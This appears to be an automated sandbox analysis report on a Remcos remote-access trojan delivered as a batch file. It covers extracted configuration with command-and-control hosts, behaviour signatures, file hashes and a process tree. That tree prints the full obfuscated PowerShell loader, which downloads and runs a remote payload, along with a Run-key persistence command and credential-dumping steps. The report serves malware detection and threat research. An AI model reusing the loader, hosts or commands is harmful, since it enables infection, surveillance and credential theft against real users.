Resubmissions

31/03/2025, 15:20

250331-sqqlbavny7 10

31/03/2025, 15:11

250331-skqdcsvmz2 10

Analysis

  • max time kernel
    119s
  • max time network
    108s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31/03/2025, 15:20

General

  • Target

    2025.02.222 n.ts შპს განსხვავებული.bat

  • Size

    3KB

  • MD5

    1db91aace1aac9f3e07036598aeaa98b

  • SHA1

    c8f4074759f0ea7eef262c36163db7868c6503f7

  • SHA256

    3d5032b506dcc1626efecbebb7f97ff8539200b6090fffa96ef6090d7082d249

  • SHA512

    9f5e409c1d48c3fddb13085949a4141962000fcf45614cf6feff841d6331adec33cfd95d9836761436e6fed4b87136d730396da9ac89c065fe76f264b5d98de4

Malware Config

Extracted

Family

remcos

Botnet

Sending

C2

jamourtg6hansit1.duckdns.org:3980

jamourtg6hansit1.duckdns.org:3981

jamourtg6hansit2.duckdns.org:3980

jamourtg6hansit3.duckdns.org:3980

jamourtg6hansit4.duckdns.org:3980

jamourtg6hansit5.duckdns.org:3980

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    hjlbtisot.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    kmportsrgsd-ZX0BIK

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Detected Nirsoft tools 4 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 2 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2025.02.222 n.ts შპს განსხვავებული.bat" bcdedit /c set delete /r readonly /f force /t 2
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5744
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "Get-Service;$Offshore='func';Get-History;$Offshore+='t';Get-History;$Offshore+='i';$trkrudens=Get-History;$Offshore+='on:';(ni -p $Offshore -n Harpendes -value { param($Ventepositionen);$Tropikfronternes=1;do {$Intellekt185+=$Ventepositionen[$Tropikfronternes];$Tropikfronternes+=2} until(!$Ventepositionen[$Tropikfronternes])$Intellekt185});(ni -p $Offshore -n Metabolisms -value {param($Sandwichs);.($Forbrugsforeningernes) ($Sandwichs)});ConvertTo-Html;$photophone=Harpendes ' n e T .,w';$photophone+=Harpendes '.EPbucTl iBE NCt';$Overhngets=Harpendes ' M oEzOi l l a /';$Tradeswomen=Harpendes ' T lBsD1 2';$Folkeregistrets='S[,NIe t,. s e RMvkI cCe p oNi N TaM.AEN.a G e r ]S: : S e cOU.RmI tmyFpBR oTT oCC o.LA=L$ T R aHd.Ecs w o M eFN';$Overhngets+=Harpendes ',5U.,0S H(SW i.nHdPoAwFsD FNGTB 1 0D.V0C; VW iBn 6a4 ; x 6N4.;K ,rTvS:,1C3 4A.B0 ) G e c k,o /U2A0C1 0 0U1A0K1 PFMibrPe,f oMx / 1 3B4 .c0';$Fails=Harpendes '.uHsSeAR -FA G ESN.T';$velkendtes=Harpendes ' hGt t pAsS:B/ / a fTlSa c l,t dD.GtGotp / L yhc.iFnUeD.Ml zPh';$Shippingelev=Harpendes ' >';$Forbrugsforeningernes=Harpendes 'IIDELX';$Brndborerens='Hjlpemotorernes';$Smrrebrdssedlernes='\Epikureres.Sup';Metabolisms (Harpendes 'Z$CG lSO b,a,l : BGE k eFn D,E lTs EVSFs KARdI,f t E r,sT=R$OE n,V : AHpFpEDMa TbAR+,$SS,mVR rOEPBPr.dPS SIEDd l EVr N.e.S');Metabolisms (Harpendes 'M$ G lOOEB aBLD:FSTQSU IATK=B$ vSe,LNK ePN DNtdE s .vs,PclgiKt (M$ S h i PMPSIMnSg,e LPEVVU)');Metabolisms (Harpendes $Folkeregistrets);$velkendtes=$Squit[0];$Arbejdsregler=(Harpendes ' $ GBl.oSb a,Lc:Gd E f L e cMTVi.O nKIKS,EPs.2F0 =KnUECWE-mOBb jAe,CstE UsSY S.t EPM,. $AP.h O T o,P,H,O n E');Metabolisms ($Arbejdsregler);Metabolisms (Harpendes 'A$HDUesfol.eTcdt,iBo nSiMsBers 2K0S. HZeLaFd eJrSsJ[t$ FLaPi lGsR],= $BO v e rRh nTgNeMtUs');$Botcherly=Harpendes ' $ DTe.f lbe cetAi oPn i sFe sE2S0D.BDPoSwLnAl,o a d FBiClCeF(P$Pv e,l k e n d tAeIsK,C$sF eNtFt iKc u.s )';$Fetticus=$Bekendelsesskrifters;Metabolisms (Harpendes 's$HG L,o b a lP:BDPy S mCO RhFCITS TFiRS Ku= (MT ETSAT,- P A TAH $ FpEStKtOi.C u,sA)');while (!$Dysmorfistisk) {Metabolisms (Harpendes 'R$TgDlKoTbFa l :TKDe e sMh.oPn dLs.=H$ S kGaSr nPsCuNn g eprTn e') ;Metabolisms $Botcherly;Metabolisms (Harpendes 'g[ T h rBE a D i,NCg .ST HXr E a.dN]P: :PsGLTe e P,(K4A0 0 0 )');Metabolisms (Harpendes 'R$ GSL,OGbCa lA:Sd ySsSMCO,RPfOI.sst IUSFkP= (STOE S t,-FPHATtOHA D$,fFE t t iNC uTs )') ;Metabolisms (Harpendes ',$ g lao b A l : N.iVG hGt s =,$fgBlNoEbPAUl.: O,pSdSAbt EErMIKnKGKs S.IKd E r NCEKs + + % $SSWQSUUIUtT..C o uFNST') ;$velkendtes=$Squit[$nights]}$Floristics=404568;$Excruciates=26946;Metabolisms (Harpendes ' $ gFl,O B A,LS:BtSoDd d YSS KSeBeIR nteRs =. GMEAt -SCEO n.tKE N TA $,fRE,t T i c U s');Metabolisms (Harpendes ' $,gslHo b a l :ROLgSe org,r.aap hDi cHaBlBl yK =F O[VSKyTs t eTm . C oknUv e r t ] :.:OF r o mSBUaSsMeA6B4NS t r iBn gd(A$PT o d d y s,keeFe.r nAe s,)');Metabolisms (Harpendes 'P$ gSlAo b A l : K l.aBGGe T. = P[CS Y S tMe mS.St EFX t .SE n cNo D i.nUG.]L:S:,A SKC IMIS.,GbEptPS t.R,i.N Gm(,$.OBG e,oAG r a P,HSitc,a L l y )');Metabolisms (Harpendes 'A$ GFl.opbAa,L.: NkU MmmFEUr E R e =A$WK lAaJGAE.tH..SOUVbSs t RKI n,gP(k$ FcLwOPr iUSNtPiCC.sD,,$LEBXSC RAUEcOI aATSe s )');Metabolisms $Nummerere;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:968
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Offshore='func';Get-History;$Offshore+='t';Get-History;$Offshore+='i';$trkrudens=Get-History;$Offshore+='on:';(ni -p $Offshore -n Harpendes -value { param($Ventepositionen);$Tropikfronternes=1;do {$Intellekt185+=$Ventepositionen[$Tropikfronternes];$Tropikfronternes+=2} until(!$Ventepositionen[$Tropikfronternes])$Intellekt185});(ni -p $Offshore -n Metabolisms -value {param($Sandwichs);.($Forbrugsforeningernes) ($Sandwichs)});ConvertTo-Html;$photophone=Harpendes ' n e T .,w';$photophone+=Harpendes '.EPbucTl iBE NCt';$Overhngets=Harpendes ' M oEzOi l l a /';$Tradeswomen=Harpendes ' T lBsD1 2';$Folkeregistrets='S[,NIe t,. s e RMvkI cCe p oNi N TaM.AEN.a G e r ]S: : S e cOU.RmI tmyFpBR oTT oCC o.LA=L$ T R aHd.Ecs w o M eFN';$Overhngets+=Harpendes ',5U.,0S H(SW i.nHdPoAwFsD FNGTB 1 0D.V0C; VW iBn 6a4 ; x 6N4.;K ,rTvS:,1C3 4A.B0 ) G e c k,o /U2A0C1 0 0U1A0K1 PFMibrPe,f oMx / 1 3B4 .c0';$Fails=Harpendes '.uHsSeAR -FA G ESN.T';$velkendtes=Harpendes ' hGt t pAsS:B/ / a fTlSa c l,t dD.GtGotp / L yhc.iFnUeD.Ml zPh';$Shippingelev=Harpendes ' >';$Forbrugsforeningernes=Harpendes 'IIDELX';$Brndborerens='Hjlpemotorernes';$Smrrebrdssedlernes='\Epikureres.Sup';Metabolisms (Harpendes 'Z$CG lSO b,a,l : BGE k eFn D,E lTs EVSFs KARdI,f t E r,sT=R$OE n,V : AHpFpEDMa TbAR+,$SS,mVR rOEPBPr.dPS SIEDd l EVr N.e.S');Metabolisms (Harpendes 'M$ G lOOEB aBLD:FSTQSU IATK=B$ vSe,LNK ePN DNtdE s .vs,PclgiKt (M$ S h i PMPSIMnSg,e LPEVVU)');Metabolisms (Harpendes $Folkeregistrets);$velkendtes=$Squit[0];$Arbejdsregler=(Harpendes ' $ GBl.oSb a,Lc:Gd E f L e cMTVi.O nKIKS,EPs.2F0 =KnUECWE-mOBb jAe,CstE UsSY S.t EPM,. $AP.h O T o,P,H,O n E');Metabolisms ($Arbejdsregler);Metabolisms (Harpendes 'A$HDUesfol.eTcdt,iBo nSiMsBers 2K0S. HZeLaFd eJrSsJ[t$ FLaPi lGsR],= $BO v e rRh nTgNeMtUs');$Botcherly=Harpendes ' $ DTe.f lbe cetAi oPn i sFe sE2S0D.BDPoSwLnAl,o a d FBiClCeF(P$Pv e,l k e n d tAeIsK,C$sF eNtFt iKc u.s )';$Fetticus=$Bekendelsesskrifters;Metabolisms (Harpendes 's$HG L,o b a lP:BDPy S mCO RhFCITS TFiRS Ku= (MT ETSAT,- P A TAH $ FpEStKtOi.C u,sA)');while (!$Dysmorfistisk) {Metabolisms (Harpendes 'R$TgDlKoTbFa l :TKDe e sMh.oPn dLs.=H$ S kGaSr nPsCuNn g eprTn e') ;Metabolisms $Botcherly;Metabolisms (Harpendes 'g[ T h rBE a D i,NCg .ST HXr E a.dN]P: :PsGLTe e P,(K4A0 0 0 )');Metabolisms (Harpendes 'R$ GSL,OGbCa lA:Sd ySsSMCO,RPfOI.sst IUSFkP= (STOE S t,-FPHATtOHA D$,fFE t t iNC uTs )') ;Metabolisms (Harpendes ',$ g lao b A l : N.iVG hGt s =,$fgBlNoEbPAUl.: O,pSdSAbt EErMIKnKGKs S.IKd E r NCEKs + + % $SSWQSUUIUtT..C o uFNST') ;$velkendtes=$Squit[$nights]}$Floristics=404568;$Excruciates=26946;Metabolisms (Harpendes ' $ gFl,O B A,LS:BtSoDd d YSS KSeBeIR nteRs =. GMEAt -SCEO n.tKE N TA $,fRE,t T i c U s');Metabolisms (Harpendes ' $,gslHo b a l :ROLgSe org,r.aap hDi cHaBlBl yK =F O[VSKyTs t eTm . C oknUv e r t ] :.:OF r o mSBUaSsMeA6B4NS t r iBn gd(A$PT o d d y s,keeFe.r nAe s,)');Metabolisms (Harpendes 'P$ gSlAo b A l : K l.aBGGe T. = P[CS Y S tMe mS.St EFX t .SE n cNo D i.nUG.]L:S:,A SKC IMIS.,GbEptPS t.R,i.N Gm(,$.OBG e,oAG r a P,HSitc,a L l y )');Metabolisms (Harpendes 'A$ GFl.opbAa,L.: NkU MmmFEUr E R e =A$WK lAaJGAE.tH..SOUVbSs t RKI n,gP(k$ FcLwOPr iUSNtPiCC.sD,,$LEBXSC RAUEcOI aATSe s )');Metabolisms $Nummerere;"
    1⤵
    • Network Service Discovery
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5928
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4088
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Entrochus" /t REG_EXPAND_SZ /d "%Reimburses% -windowstyle 1 $Frynsernes143=(gi 'HKCU:\Software\Forlydes\').GetValue('coxswains');%Reimburses% ($Frynsernes143)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:556
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Entrochus" /t REG_EXPAND_SZ /d "%Reimburses% -windowstyle 1 $Frynsernes143=(gi 'HKCU:\Software\Forlydes\').GetValue('coxswains');%Reimburses% ($Frynsernes143)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:5756
      • C:\Windows\SysWOW64\recover.exe
        C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\buqtlzisxwejuym"
        3⤵
          PID:4172
        • C:\Windows\SysWOW64\recover.exe
          C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\buqtlzisxwejuym"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1500
        • C:\Windows\SysWOW64\recover.exe
          C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\dowmmrsutewnenarmck"
          3⤵
          • Accesses Microsoft Outlook accounts
          • System Location Discovery: System Language Discovery
          PID:1608
        • C:\Windows\SysWOW64\recover.exe
          C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\oqbeekdnhmoagtxvvnxysx"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2504

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      51bb3f5f1869313e8951f821e70745b1

      SHA1

      e44d1ac01abd1c147ea176e9ce780e34b0e208c6

      SHA256

      82e75c7c7b5577f86fa4b8f8260c87812b559e4dbc90981e885d85a40b27e420

      SHA512

      5f5c60c3c1634d9c4194999dcbd8fbf8936e4e6ca6ee96ca115296ec126f7c5ceaa27fe2446b50f92d229aae472f527d3447383ca927b24c3756302ab2f57436

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b4ugu54y.rsf.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\buqtlzisxwejuym

      Filesize

      4KB

      MD5

      6224ddef196ff48ffb281549ee916978

      SHA1

      4ff6cd8c27e1871f5b99202cb86f2afeb3632135

      SHA256

      7482b7918512a8a68c393999a20163c0de6c9bdf52c2b69f4a12d4f37a76a60b

      SHA512

      7a42f272806a8e6734f023cf9e5938173d628e4d62e32d77c203d54bd26ef8e529962eecd1670f78186531648dcab1caf524c1ae404dd077b234d5bc6fed0f84

    • C:\Users\Admin\AppData\Roaming\Epikureres.Sup

      Filesize

      561KB

      MD5

      fe566224082e2fd8765e323a73a2d9f2

      SHA1

      86a2fd4c14b36fc636efdfa6713ba3a3ae149937

      SHA256

      52de732643d3945e5e12154ea8dd7f8643419e5432b8ee9059c32c250532f772

      SHA512

      2c7c37d9c1cebc9915b082e0db60a41b8afffba7d6e35c115fa2ee98a0ac3f7fc28b5e55f019da852d4a7597644f0587fa370233f59101d37e7db303f06c4886

    • memory/968-14-0x00007FFD5DD10000-0x00007FFD5E7D1000-memory.dmp

      Filesize

      10.8MB

    • memory/968-17-0x00007FFD5DD10000-0x00007FFD5E7D1000-memory.dmp

      Filesize

      10.8MB

    • memory/968-18-0x00007FFD5DD10000-0x00007FFD5E7D1000-memory.dmp

      Filesize

      10.8MB

    • memory/968-21-0x00007FFD5DD10000-0x00007FFD5E7D1000-memory.dmp

      Filesize

      10.8MB

    • memory/968-13-0x00007FFD5DD10000-0x00007FFD5E7D1000-memory.dmp

      Filesize

      10.8MB

    • memory/968-2-0x00007FFD5DD13000-0x00007FFD5DD15000-memory.dmp

      Filesize

      8KB

    • memory/968-12-0x000001497E1B0000-0x000001497E1D2000-memory.dmp

      Filesize

      136KB

    • memory/1500-75-0x0000000000400000-0x000000000047D000-memory.dmp

      Filesize

      500KB

    • memory/1500-72-0x0000000000400000-0x000000000047D000-memory.dmp

      Filesize

      500KB

    • memory/1608-77-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/1608-78-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/1608-73-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/2504-79-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/2504-74-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/2504-76-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/4088-66-0x0000000000E10000-0x0000000002064000-memory.dmp

      Filesize

      18.3MB

    • memory/4088-85-0x0000000022610000-0x0000000022629000-memory.dmp

      Filesize

      100KB

    • memory/4088-88-0x0000000022610000-0x0000000022629000-memory.dmp

      Filesize

      100KB

    • memory/4088-89-0x0000000022610000-0x0000000022629000-memory.dmp

      Filesize

      100KB

    • memory/5928-57-0x0000000074B70000-0x0000000075320000-memory.dmp

      Filesize

      7.7MB

    • memory/5928-41-0x00000000064B0000-0x00000000064FC000-memory.dmp

      Filesize

      304KB

    • memory/5928-48-0x0000000074B70000-0x0000000075320000-memory.dmp

      Filesize

      7.7MB

    • memory/5928-49-0x0000000074B70000-0x0000000075320000-memory.dmp

      Filesize

      7.7MB

    • memory/5928-50-0x0000000074B70000-0x0000000075320000-memory.dmp

      Filesize

      7.7MB

    • memory/5928-51-0x0000000074B7E000-0x0000000074B7F000-memory.dmp

      Filesize

      4KB

    • memory/5928-52-0x0000000074B70000-0x0000000075320000-memory.dmp

      Filesize

      7.7MB

    • memory/5928-53-0x0000000074B70000-0x0000000075320000-memory.dmp

      Filesize

      7.7MB

    • memory/5928-54-0x0000000009040000-0x000000000D274000-memory.dmp

      Filesize

      66.2MB

    • memory/5928-55-0x0000000074B70000-0x0000000075320000-memory.dmp

      Filesize

      7.7MB

    • memory/5928-56-0x0000000074B70000-0x0000000075320000-memory.dmp

      Filesize

      7.7MB

    • memory/5928-43-0x00000000069A0000-0x00000000069BA000-memory.dmp

      Filesize

      104KB

    • memory/5928-59-0x0000000074B70000-0x0000000075320000-memory.dmp

      Filesize

      7.7MB

    • memory/5928-42-0x0000000007740000-0x00000000077D6000-memory.dmp

      Filesize

      600KB

    • memory/5928-40-0x00000000060B0000-0x00000000060CE000-memory.dmp

      Filesize

      120KB

    • memory/5928-38-0x0000000006150000-0x00000000064A4000-memory.dmp

      Filesize

      3.3MB

    • memory/5928-37-0x00000000060E0000-0x0000000006146000-memory.dmp

      Filesize

      408KB

    • memory/5928-36-0x0000000005EF0000-0x0000000005F56000-memory.dmp

      Filesize

      408KB

    • memory/5928-31-0x00000000056D0000-0x00000000056F2000-memory.dmp

      Filesize

      136KB

    • memory/5928-24-0x0000000074B70000-0x0000000075320000-memory.dmp

      Filesize

      7.7MB

    • memory/5928-25-0x00000000057C0000-0x0000000005DE8000-memory.dmp

      Filesize

      6.2MB

    • memory/5928-23-0x0000000002B70000-0x0000000002BA6000-memory.dmp

      Filesize

      216KB

    • memory/5928-22-0x0000000074B7E000-0x0000000074B7F000-memory.dmp

      Filesize

      4KB

    • memory/5928-46-0x00000000089C0000-0x000000000903A000-memory.dmp

      Filesize

      6.5MB

    • memory/5928-45-0x0000000007D90000-0x0000000008334000-memory.dmp

      Filesize

      5.6MB

    • memory/5928-44-0x0000000006A30000-0x0000000006A52000-memory.dmp

      Filesize

      136KB